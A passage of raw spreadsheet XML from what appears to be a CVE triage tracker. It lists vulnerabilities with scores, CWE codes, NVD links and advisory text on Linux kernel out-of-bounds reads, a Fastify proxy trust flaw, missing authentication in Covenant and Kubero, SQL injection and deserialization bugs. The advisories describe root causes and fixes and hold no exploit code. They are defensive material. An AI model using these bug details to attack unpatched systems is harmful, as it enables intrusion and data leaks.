  __vfs_getxattr (fs/xattr.c:441)
  vfs_getxattr (fs/xattr.c:474)
  do_getxattr (fs/xattr.c:800)
  path_getxattrat (fs/xattr.c:868)
  do_syscall_64 (arch/x86/entry/syscall_64.c:94)
 The buggy address is located 80 bytes inside of
  allocated 84-byte region in cache kmalloc-96
Compute the size the record needs and require ef-&gt;size to cover it.</t>
        </is>
      </c>
      <c r="S126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89779</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89786</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr"/>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr"/>
      <c r="Q127" s="5" t="inlineStr"/>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ext4: fix out-of-bounds read in ext4_read_inline_dir()
ext4_read_inline_dir() can read a dirent header past the end of its inline
buffer, triggering a slab-out-of-bounds read during getdents64():
  BUG: KASAN: slab-out-of-bounds in __ext4_check_dir_entry
  Read of size 2 at addr ffff88800f3dd23c by task exploit/148
   ...
   __ext4_check_dir_entry
   ext4_read_inline_dir
   iterate_dir
The dirent payload lives in a buffer of exactly inline_size bytes:
	dir_buf = kmalloc(inline_size, GFP_NOFS);
but iteration runs in a position space extra_offset bytes larger
(extra_size = extra_offset + inline_size) so the synthetic "." and ".."
land at their block-dir offsets. A dirent is formed at "dir_buf + pos -
extra_offset", yet the ext4_check_dir_entry() length argument uses the
larger extra_size. A position whose dirent header would extend past
extra_size is therefore accepted, and the rescan loop's rec_len probe and
ext4_check_dir_entry() dereference de-&gt;rec_len before the entry is rejected.
Reject a position whose minimum-size dirent header would not fit within
extra_size before forming de, in both the rescan and main loops, and pass
inline_size rather than extra_size to ext4_check_dir_entry() so the length
check matches the physical buffer.</t>
        </is>
      </c>
      <c r="S127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89786</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89846</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="inlineStr"/>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr"/>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr"/>
      <c r="Q128" s="5" t="inlineStr"/>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Bound rsp_info_len to avoid OOB sense-data read
In qla2x00_status_entry(), the FWI2 status path advances sense_data and
shrinks par_sense_len by rsp_info_len:
	if (IS_FWI2_CAPABLE(ha)) {
		sense_data += rsp_info_len;
		par_sense_len -= rsp_info_len;
	}
rsp_info_len is a 32-bit value taken directly from the target's FCP
response (sf.rsp_data_len), while par_sense_len is the IOCB data area
size (28 bytes for 24xx, 60 bytes for 29xx). A hostile or buggy target
reporting an rsp_info_len larger than par_sense_len makes the unsigned
subtraction underflow to a huge value and advances sense_data out of
bounds.
The underflowed par_sense_len then defeats the cap in
qla2x00_handle_sense():
	if (sense_len &gt; par_sense_len)
		sense_len = par_sense_len;
	memcpy(cp-&gt;sense_buffer, sense_data, sense_len);
so the memcpy reads up to SCSI_SENSE_BUFFERSIZE bytes from the
out-of-bounds sense_data pointer, leaking adjacent response-ring/heap
memory into the command's sense buffer.
Clamp rsp_info_len to par_sense_len before the subtraction so
par_sense_len can never underflow and sense_data stays within the IOCB
data area. The fix sits before the comp_status switch, covering both
qla2x00_handle_sense() call sites.</t>
        </is>
      </c>
      <c r="S128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89846</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90011</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="inlineStr"/>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr"/>
      <c r="K129" s="5" t="inlineStr"/>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr"/>
      <c r="Q129" s="5" t="inlineStr"/>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: target: iscsi: Reserve a terminator byte for the login payload
iscsi_target_check_login_request() rejects a login PDU whose
DataSegmentLength exceeds MAX_KEY_VALUE_PAIRS, but the test is '&gt;' and
login-&gt;req_buf is allocated with exactly MAX_KEY_VALUE_PAIRS
bytes. Since iscsit_get_login_rx() receives payload_length + padding
bytes, where
	padding = ((-payload_length) &amp; 3);
any payload_length from 8189 to 8192 fills the whole 8192 byte
buffer. The write stays in bounds, but no byte is left for a NUL
terminator.
The buffer is subsequently consumed as a C string. In the CHAP path
chap_check_algorithm() calls kstrdup(a_str), and extract_param() calls
strstr(in_buf, pattern) followed by strlen_semi(), none of which take a
length. convert_null_to_semi() additionally rewrites every embedded NUL
to ';', so even a payload made of well formed NUL separated key=value
records is left without a terminator. These walk past the end of the
object into adjacent slab memory. It is reachable by an unauthenticated
initiator against a portal configured for CHAP; when authentication is
not required iscsi_login_zero_tsih_s2() rewrites AuthMethod to None and
the CHAP path is never entered.
Allocate one extra byte. kzalloc() zeroes it and nothing ever writes to
it, as every writer copies to offset 0 for at most MAX_KEY_VALUE_PAIRS
bytes, so the buffer is always terminated.</t>
        </is>
      </c>
      <c r="S129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90011</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92395</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="inlineStr"/>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr"/>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr"/>
      <c r="Q130" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-348, CWE-697</t>
        </is>
      </c>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>@fastify/proxy-addr is a Fastify plugin that determines a request's client address behind trusted reverse proxies, and it backs Fastify request.ip and request.ips. In versions 3.0.0 through 5.1.0, a trust subnet written in IPv4-mapped IPv6 notation with an IPv4-sized prefix, such as ::ffff:10.0.0.0/8 instead of the correct ::ffff:10.0.0.0/104, is accepted without error but trusts every IPv4 address on the internet rather than the block it names. Because the socket peer then becomes trusted at hop 0, any unauthenticated client can supply an arbitrary X-Forwarded-For header and control the address the application reads, which defeats IP-based access control, rate limiting, geolocation, and audit logging. The plugin inherited this defect from the upstream proxy-addr module (CVE-2026-90711). The issue is fixed in @fastify/proxy-addr 5.1.1, and users should upgrade to 5.1.1 or later. As a workaround, ensure any IPv4-mapped IPv6 trust subnet uses a prefix length of at least 97, or express the range in plain IPv4 notation.</t>
        </is>
      </c>
      <c r="S130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92395</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92717</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="inlineStr"/>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr"/>
      <c r="K131" s="5" t="inlineStr"/>
      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr"/>
      <c r="Q131" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>Covenant through 0.6 registers the CovenantHub SignalR hub without an Authorize attribute, allowing unauthenticated callers to invoke CreateHttpListener and receive a signed JWT token. Attackers can use the obtained token to authenticate against the entire operator API and access grunts, credentials, binaries, events, and the operator roster.</t>
        </is>
      </c>
      <c r="S131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92717</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92720</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="inlineStr"/>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr"/>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr"/>
      <c r="Q132" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>Kubero through 3.1.1 fails to apply authentication guards to the notifications API endpoints, allowing unauthenticated attackers to read webhook secrets and service URLs. Attackers can retrieve stored credentials and register malicious webhooks to intercept pipeline events or suppress alerting by deleting existing configurations.</t>
        </is>
      </c>
      <c r="S132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92720</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76420</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="inlineStr"/>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K133" s="5" t="inlineStr"/>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr"/>
      <c r="Q133" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the internal configuration of the Apache JServ Protocol (AJP)&amp;nbsp;connector for Cisco Secure FMC Software could allow an unauthenticated, remote attacker to impersonate a peer device.
This vulnerability is due to incorrect initialization of encryption parameters for the AJP connector at boot time. An attacker could exploit this vulnerability by sending crafted packets to the AJP connector. A&amp;nbsp;successful exploit could allow the attacker to execute commands as root and&amp;nbsp;gain full control over the FMC REST APIs on the affected device.
Note: This vulnerability can be exploited only if the valid sftunnel connection between Cisco Secure FMC Software and Cisco Secure FTD Software is down.</t>
        </is>
      </c>
      <c r="S133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76420</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73455</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr"/>
      <c r="K134" s="5" t="inlineStr"/>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr"/>
      <c r="Q134" s="5" t="inlineStr">
        <is>
          <t>CWE-130</t>
        </is>
      </c>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with Open Shortest Path First version 3 (OSPFv3) configured, a specially crafted packet can cause the OSPFv3 agent to restart unexpectedly.</t>
        </is>
      </c>
      <c r="S134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73455</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77403</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="inlineStr"/>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr"/>
      <c r="K135" s="5" t="inlineStr"/>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr"/>
      <c r="Q135" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ amqp091-go is a Go AMQP 0.9.1 client. Prior to 1.13.0, Connection.openTune in connection.go accepts a server-advertised FrameMax below the AMQP frameMinSize value of 4096 bytes because the connection negotiation loop does not enforce the protocol minimum. A malicious or compromised AMQP broker can therefore advertise an extremely small FrameMax, causing later client publications to be fragmented into excessive numbers of frames and write operations. This can consume CPU and stall the client or its host. This issue is fixed in version 1.13.0.</t>
        </is>
      </c>
      <c r="S135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77403</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77410</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="inlineStr"/>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr"/>
      <c r="K136" s="5" t="inlineStr"/>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr"/>
      <c r="Q136" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ amqp091-go is a Go AMQP 0.9.1 client. Prior to 1.13.0, Channel.recvContent in channel.go preallocates the message body slice with the uint64 ch.header.Size value supplied by an AMQP content header without capping the allocation to the negotiated Connection.Config.FrameSize value. A malicious or compromised broker can send an extreme declared body size and cause the Go runtime to attempt a correspondingly large allocation before body data is received. The allocation can exhaust memory and terminate the client process. This issue is fixed in version 1.13.0.</t>
        </is>
      </c>
      <c r="S136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77410</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77412</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="inlineStr"/>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr"/>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr"/>
      <c r="Q137" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ amqp091-go is a Go AMQP 0.9.1 client. Prior to 1.13.0, readField in read.go reads the length of an AMQP byte-array field with type tag x into a signed int32 and passes the value directly to make when allocating the field buffer. A malicious or compromised broker can encode a value such as 0xFFFFFFFF, which becomes -1 and causes a len out of range runtime panic. The panic escapes the network reader goroutine and terminates the client process, including during connection.start server properties or message header table parsing. This issue is fixed in version 1.13.0.</t>
        </is>
      </c>
      <c r="S137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77412</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8462</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>02762ae7-200e-4b20-9b2b-a77d5b8fc4cb</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr"/>
      <c r="Q138" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>SQL injection in ClickHouse-backed meter definitions in OpenMeter OpenMeter before v1.0.0-beta.228 on all platforms allows a remote unauthenticated attacker to access or modify metering event data, and potentially cause denial of service, via crafted user-controlled JSONPath values submitted to meters API.</t>
        </is>
      </c>
      <c r="S138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8462</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-46273</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr"/>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr"/>
      <c r="Q139" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>Bonjour Gateway in Extreme Networks IQ Engine before 10.6r1a, and through 10.6r4 before 10.6r5, has an ah_bgd buffer overflow via ah_event_send.</t>
        </is>
      </c>
      <c r="S139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-46273</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13293</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr"/>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr"/>
      <c r="Q140" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>IBM MQ 9.1.0.0 through 9.1.0.37 LTS, 9.2.0.0 through 9.2.0.43 LTS, 9.3.0.0 through 9.3.0.41 LTS, 9.3.0.0 through 9.3.5.1 CD, 9.4.0.0 through 9.4.0.25 LTS, 9.4.0.0 through 9.4.5.1 CD, and 10.0.0.0 could allow a remote authenticated attacker to execute arbitrary code on the system due to the deserialization of untrusted data.</t>
        </is>
      </c>
      <c r="S140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13293</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16428</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr"/>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr"/>
